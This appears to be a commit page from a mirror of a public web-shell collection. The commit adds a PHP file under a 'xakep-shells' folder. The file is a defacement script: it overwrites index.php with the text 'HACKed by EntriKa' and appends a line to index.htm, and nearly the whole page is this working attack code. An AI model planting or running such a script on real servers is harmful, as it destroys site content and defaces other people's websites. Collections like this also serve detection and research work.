mirror of
https://github.com/tennc/webshell.git
synced 2025-12-07 13:21:28 +00:00
reupdate xakepshell
This commit is contained in:
13
xakep-shells/PHP/Test.php.php.txt
Normal file
13
xakep-shells/PHP/Test.php.php.txt
Normal file
@@ -0,0 +1,13 @@
|
||||
<?php
|
||||
$entry_line="HACKed by EntriKa";
|
||||
$fp = fopen("index.php", "w");
|
||||
fputs($fp, $entry_line);
|
||||
fclose($fp);
|
||||
?>
|
||||
|
||||
<?
|
||||
$fp =@fopen("index.htm", "a+");
|
||||
$yazi = "test" . "\r\n";
|
||||
fwrite ($fp, "$yazi");
|
||||
fclose ($fp);
|
||||
?>
|
||||
Reference in New Issue
Block a user